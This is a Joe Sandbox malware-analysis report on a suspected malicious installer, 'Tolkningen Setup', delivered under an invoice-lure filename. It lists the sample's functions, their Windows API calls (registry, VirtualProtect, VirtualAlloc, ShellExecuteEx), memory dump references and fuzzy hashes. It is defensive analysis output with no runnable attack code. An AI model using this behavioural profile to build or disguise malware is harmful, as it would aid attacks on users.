                                Function 00406280 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062A9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: a0b6da99e5e71265e8373ba8059e24fe5c697144cc542e2b776cf21a3b2d53e8
                                • Instruction ID: b0a4c2d15b2ea223642b35464fd2bd164e57500baa871115652c712219d0a331
                                • Opcode Fuzzy Hash: a0b6da99e5e71265e8373ba8059e24fe5c697144cc542e2b776cf21a3b2d53e8
                                • Instruction Fuzzy Hash: 2FE0BF72050209BEEF055F50DD0AD7B371DEB58310F01452EB90695151E6B5A9306634
                                Function 6FA41A4A Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(6FA4501C,00000004,00000040,6FA45034), ref: 6FA41A68
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 97b2c5b9c45bd4095601715aad35a427aa4ad027d1b76c1a688e514678be9d4c
                                • Instruction ID: 058892135b1009b4f21ad10c0af246d825fe8194bd0ec31f6c002b874578beab
                                • Opcode Fuzzy Hash: 97b2c5b9c45bd4095601715aad35a427aa4ad027d1b76c1a688e514678be9d4c
                                • Instruction Fuzzy Hash: EBF0C07CD19B40DECB18EF1CD4446053AE0B7DA364B00C52EF648DA340C377456A9B9A
                                Function 004062B3 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,00000000,00000800,?,?,00406980,00000800,?,?,?,Call,00000000,00000000), ref: 004062D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                • Instruction ID: a9f46a368aaeb036b72fdcd0ca7d488aed4e3e02bd852bac4dcbc1d9cb67b826
                                • Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                • Instruction Fuzzy Hash: 4AD0173204020DBBDF11AF90EE01FAB3B2DBB08350F11482AFE06A51A0D776D530AB28
                                Function 004054C3 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(0001042C,00000000,00000000,00000000), ref: 004054D5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 8966e46b3975f2e1c16f9867a4bf07e8db3346cd8fc1914bcd432734a71edc09
                                • Instruction ID: 3e6f8704fad9210af6eeac90bfa5cfee8a7ec38ce607d6f75afee67e22a823f2
                                • Opcode Fuzzy Hash: 8966e46b3975f2e1c16f9867a4bf07e8db3346cd8fc1914bcd432734a71edc09
                                • Instruction Fuzzy Hash: 68C04C717416407AEA209B619D05F077754A750701F11C8397240E51E0CB74E450DA2C
                                Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                Download Yara Rule
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                • Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
                                • Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                • Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D
                                Function 004054DE Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000028,?,?,00405313), ref: 004054EC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 9aa02c774ae0962c5acd4825ba0c1cef62293177251d585e3810513b907da834
                                • Instruction ID: c497e426ea7075a905a985053a922d02012b07db19d19f6086ec7a715a02fc42
                                • Opcode Fuzzy Hash: 9aa02c774ae0962c5acd4825ba0c1cef62293177251d585e3810513b907da834
                                • Instruction Fuzzy Hash: F7B09235286601AAEA215B00DE09F4A7B62E7A4701F018439B241640B4CFF200A1DB18
                                Function 6FA42D14 Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(?), ref: 6FA42DD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e71a3b1a22c257f1a19715dcd7c33e6c9dd062eb64902bdcc32a4be528913e8f
                                • Instruction ID: 4a27703e246489fdb40bbbe14bd9cdf401076eda905d55c3d79717ffef517352
                                • Opcode Fuzzy Hash: e71a3b1a22c257f1a19715dcd7c33e6c9dd062eb64902bdcc32a4be528913e8f
                                • Instruction Fuzzy Hash: 21418279900704DFDB10EFA8DA81B593BF4EB85368F24802AE504CB290D73E95E6CA90

                                Non-executed Functions

                                Function 004043F9 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 576windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 00404411
                                • GetDlgItem.USER32(?,00000408), ref: 0040441D
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404465
                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 0040447E
                                • SetWindowLongW.USER32(00000000,000000FC,Function_000058AB), ref: 00404495
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004044AB
                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004044BD
                                • SendMessageW.USER32(00000000,00001109,00000002), ref: 004044D0
                                • SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 004044DC
                                • SendMessageW.USER32(00000000,0000111B,00000010,00000000), ref: 004044EE
                                • DeleteObject.GDI32(00000000), ref: 004044F1
                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040451F
                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404529
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004045D4
                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 004045FE
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404614
                                • GetWindowLongW.USER32(?,000000F0), ref: 00404643
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404650
                                • ShowWindow.USER32(?,00000005), ref: 00404664
                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047A1
                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040481C
                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040483B
                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404867
                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040489C
                                • ImageList_Destroy.COMCTL32(00000000), ref: 004048C3
                                • GlobalFree.KERNEL32(00000000), ref: 004048D3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
                                • String ID: >5^$M
                                • API String ID: 1688767230-2153850456
                                • Opcode ID: e527a44e3837e2842e9643811c94d438dc10ea4f06fb5cac42bc504d6044e278
                                • Instruction ID: 6b9816283df2d563a6f6303754403db0efd655586b529c1e8cba48373a45e4bc
                                • Opcode Fuzzy Hash: e527a44e3837e2842e9643811c94d438dc10ea4f06fb5cac42bc504d6044e278
                                • Instruction Fuzzy Hash: 4F12D0B1644301AFD3249F24DC45A2BB7E9EBC8314F10493EFA95E72E1DB789C428B59
                                Function 00404060 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 281COMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 004040B1
                                • SetWindowTextW.USER32(00000000,?), ref: 004040DB
                                  • Part of subcall function 00406A15: GetDlgItemTextW.USER32(?,?,00000400,00404F27), ref: 00406A28
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Char$Next$ItemText$PrevWindow
                                • String ID: >5^$A$C:\Users\user\AppData\Local\Temp\fanin$Call
                                • API String ID: 4089110348-3098483820
                                • Opcode ID: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                • Instruction ID: 90192ee12d8343b5cbbbf9dcfc6b809e920884bf694149bd8a4c84d13eeda86d
                                • Opcode Fuzzy Hash: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                • Instruction Fuzzy Hash: E391B1B1704311ABD720AFA6DD81A6B76A8AF84704F40043FFB45B62D1DB7CD9418B6E
                                Function 00402B75 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                • Opcode ID: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                • Instruction ID: 66eca0b878d1a88cf031bc7713e4e99cd100193794d0d0043917bcbbabee6758
                                • Opcode Fuzzy Hash: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                • Instruction Fuzzy Hash: 37D0EC61414150E9D1606F718D49ABA736DAF05354F204A3EF196E10D1EAB85501932F
                                Function 004070FB Relevance: .3, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                • Instruction ID: d4ac7d1497c90a7860cde27ccfdf49f9d4c0c6eb7f3b7e6fe9b2edbc2c979ebe
                                • Opcode Fuzzy Hash: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                • Instruction Fuzzy Hash: 79C15B71A0C3918FD364CF29C48036ABBE1FBC5304F10892EE5DA9B391D678A546CB5B
                                Function 00403D65 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 221windowstringCOMMON
                                Download Yara Rule
                                APIs
                                • CheckDlgButton.USER32(?,?,00000001), ref: 00403E04
                                • EnableWindow.USER32(?), ref: 00403E11
                                • GetDlgItem.USER32(?,000003E8), ref: 00403E1D
                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E39
                                • GetSysColor.USER32(?), ref: 00403E4A
                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E58
                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E66
                                • lstrlenW.KERNEL32(?), ref: 00403E6C
                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E79
                                • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403E90
                                • GetDlgItem.USER32(?,0000040A), ref: 00403EEC
                                • SendMessageW.USER32(00000000), ref: 00403EF3
                                • EnableWindow.USER32(00000000), ref: 00403F10
                                • GetDlgItem.USER32(0000004E,000003E8), ref: 00403F34
                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403F89
                                • LoadCursorW.USER32(00000000,00007F02), ref: 00403F9B
                                • SetCursor.USER32(00000000), ref: 00403FA4
                                  • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00403FE6
                                • SetCursor.USER32(00000000), ref: 00403FE9
                                • SendMessageW.USER32(00000111,?,00000000), ref: 00404015
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040402D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                • String ID: >5^$Call$N
                                • API String ID: 3270077613-4150751978
                                • Opcode ID: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                • Instruction ID: 4fa98256382c23a77b640614663c001b7206c978ba46bfa2c34382a940cfe240
                                • Opcode Fuzzy Hash: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                • Instruction Fuzzy Hash: A881B0B1604308AFD710AF24DD44A6B7BE9FF88345F41083EF641A72A1CB789945CF59
                                Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 128COMMON
                                Download Yara Rule
                                APIs
                                • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                                • BeginPaint.USER32(?,?), ref: 0040104C
                                • GetClientRect.USER32(?,?), ref: 00401062
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                • DeleteObject.GDI32(00000000), ref: 004010FA
                                • CreateFontIndirectW.GDI32(?), ref: 00401120
                                • SetBkMode.GDI32(00000000,?), ref: 00401143
                                • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                • DrawTextW.USER32(00000000,Tolkningen Setup,000000FF,?,00000820), ref: 00401171
                                • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                • DeleteObject.GDI32(?), ref: 0040117F
                                • EndPaint.USER32(?,?), ref: 0040118E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
